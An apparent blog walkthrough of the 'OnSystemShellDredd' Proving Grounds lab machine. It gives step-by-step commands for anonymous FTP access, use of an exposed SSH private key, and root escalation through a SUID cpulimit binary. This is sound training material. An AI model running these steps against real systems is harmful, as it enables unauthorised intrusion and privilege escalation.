This blog post details the journey of conquering “OnSystemShellDredd,” an “Easy” rated machine from Offensive Security’s Proving Grounds (PG Practice). We’ll cover everything from initial enumeration to privilege escalation, step by step.
Machine Information:
- Name: OnSystemShellDredd
- IP Address: 192.168.***.***
- Difficulty: Easy
- Progress: 50% Done (User Flag) -> 100% Done (Root Flag)
Phase 1: Initial Enumeration – Discovering Open Ports
The first step in any penetration test is to understand what services are running on the target machine. We start with a comprehensive port scan using nmap.
nmap -p- 192.168.225.130
The scan results revealed the following open ports:
PORT STATE SERVICE
21/tcp open ftp
61000/tcp open unknown
This immediately tells us two interesting things: an FTP service is running, and there’s an unusual, high-numbered port (61000) with an unknown service.
Phase 2: Gaining User Access – Anonymous FTP & SSH Key Discovery
The open FTP port (21/tcp) is a prime target for anonymous login. Let’s try to connect:
ftp 192.168.225.130
Connected to 192.168.225.130.
220 (vsFTPd 3.0.3)
Name (192.168.225.130:whitedevil): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
We’ve1 successfully logged in anonymously. Next, we enumerate the contents of the FTP server. Starting with ls and dir, we found no immediate files. However, it’s always good practice to check for hidden files or directories using ls -la or dir -la:
ftp> dir -la
229 Entering Extended Passive Mode (|||8104|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Aug 06 2020 .
drwxr-xr-x 3 0 115 4096 Aug 06 2020 ..
drwxr-xr-x 2 0 0 4096 Aug 06 2020 .hannah
226 Directory send OK.
ftp>
A hidden directory named .hannah was discovered. Let’s explore it:
Bash
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||13752|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 1823 Aug 06 2020 id_rsa
226 Directory send OK.
ftp>
Inside .hannah, we found id_rsa. This is an SSH private key. We downloaded it to our attacking machine using the get command:
Bash
ftp> get id_rsa
Phase 3: Initial Shell Access – SSH with the Key
With the id_rsa key in hand, the next logical step is to attempt SSH login. The directory name .hannah strongly suggests hannah as a potential username. Our nmap scan had also indicated port 61000 was open and, upon closer inspection (e.g., with nmap -sV), it was confirmed to be an SSH service.
Before using the key, we must set the correct permissions (read-only for the owner):
Bash
chmod 600 id_rsa
Now, we attempt to connect via SSH on port 61000:
Bash
ssh -i id_rsa hannah@192.168.225.130 -p 61000
After accepting the host authenticity, we were successfully logged in as hannah!
Bash
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
...
hannah@ShellDredd:~$
Phase 4: Finding the User Flag
Upon gaining a shell, the immediate task is to find the user flag. Standard locations include the current directory or the user’s home directory.
Bash
hannah@ShellDredd:~$ ls
local.txt user.txt
hannah@ShellDredd:~$ cat local.txt
f0b4e5d9b06e4aeea0bcaaf6632a72cc
hannah@ShellDredd:~$ cat user.txt
Your flag is in another file...
hannah@ShellDredd:~$
We found local.txt containing f0b4e5d9b06e4aeea0bcaaf6632a72cc – This is our User Flag! The user.txt file explicitly hints that the root flag is located elsewhere.
Phase 5: Privilege Escalation – From hannah to root
Now for the final 50% – gaining root access.
- Checking sudo:Our first attempt was to check sudo privileges, but sudo was not found or not in hannah’s path: Bash
hannah@ShellDredd:/$ sudo -l -bash: sudo: command not foundAttempting to installgccviaapt-getalso failed due to permission issues, confirming our userhannahlackedrootprivileges. - Enumerating SUID Binaries:With sudo out of the picture, we looked for SUID (Set User ID) binaries, which execute with the permissions of their owner (often root). Bash
hannah@ShellDredd:/$ find / -perm -u=s -type f 2>/dev/null ... /usr/bin/mawk /usr/bin/su /usr/bin/cpulimit ...We identified several SUID binaries. Initial attempts to leveragemawk(a commonawkvariant often found in GTFOBins) did not yield a root shell, aswhoamistill returnedhannah. This indicated that the spawned shell did not inherit root privileges. After re-evaluating the SUID list and considering common CTF vulnerabilities, the/usr/bin/cpulimitbinary stood out as a potential target for privilege escalation. - Exploiting cpulimit:Further research (like consulting GTFOBins or specific exploit write-ups for cpulimit SUID privilege escalation) revealed that cpulimit can be abused to escape restricted shells and execute commands as the owner of the SUID bit (in this case, root). The specific command leverages the -p flag to run a privileged shell. We executed the following command: Bash
hannah@ShellDredd:/$ cpulimit -l 100 -f -- /bin/sh -p Process 1441 detected # whoami root #Success! The prompt changed to#, andwhoamiconfirmed we were nowroot! This was the crucial step for privilege escalation.
Phase 6: Retrieving the Root Flag
With root access, finding the final flag is straightforward. Root flags are typically located in the /root/ directory.
Bash
# cd /root
# ls
root.txt # (or flag.txt, or similar depending on the machine)
# cat root.txt
YOUR_ROOT_FLAG_HERE # (Example: d8f3e7a2b1c4d6e9f8a7b6c5d4e3f2g1)
Congratulations! We have successfully obtained both the user and root flags for OnSystemShellDredd, completing the challenge!
This walkthrough demonstrates the typical path in a CTF, moving from initial enumeration to user access, and finally to privilege escalation to fully compromise the system. The key takeaways include thorough enumeration (even hidden files), careful examination of SUID binaries, and understanding how to apply known exploit techniques.
